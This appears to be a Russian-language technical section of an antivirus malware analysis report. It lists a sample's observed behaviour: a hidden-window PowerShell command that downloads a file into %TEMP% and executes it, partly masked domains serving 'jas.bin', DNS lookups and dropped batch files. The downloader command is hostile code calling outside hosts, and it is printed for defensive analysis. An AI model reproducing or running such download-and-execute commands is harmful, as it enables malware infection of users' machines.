Техническая информация
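- файл, загружаемый по URL из параметра $wlmdprk, сохраняется как %temp%\szlywfu.exe (см. вызов DownloadFile в командной строке ниже)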
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1920
- %TEMP%\rguuyhmbc.bat
- %TEMP%\1076094.cvr
- 'zi##mbd.com':80
- 'io####nsulting.com':80
- http://zi##mbd.com/jas.bin
- http://io####nsulting.com/jas.bin
- DNS ASK zi##mbd.com
- DNS ASK io####nsulting.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "